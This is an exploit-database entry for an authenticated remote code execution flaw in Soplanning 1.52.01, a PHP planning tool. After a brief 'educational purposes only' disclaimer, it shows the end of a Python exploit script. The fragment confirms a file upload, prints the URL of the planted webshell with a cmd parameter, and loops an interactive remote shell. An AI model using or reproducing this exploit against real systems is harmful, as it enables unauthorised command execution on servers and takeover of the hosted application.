Exploits / Vulnerability Discovered : 2024-11-15 |
Type : webapps |
Platform : php
This exploit / vulnerability Soplanning 1.52.01 (simple online planning tool) remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
if upload_res.status_code == 200 and "File" in upload_res.text:
print(f"[+] Uploaded ===> {upload_res.text}")
print("[+] Exploit completed.")
exploit_url = f"{url}/upload/files/{link_id}/{php_filename}"
print(f"Access webshell here: {exploit_url}?cmd=<command>")
if "yes" == input("Do you want an interactive shell? (yes/no) "):
try:
while True:
command_shell(exploit_url)
except Exception as e:
raise(f"Error: {e}")
else:
pass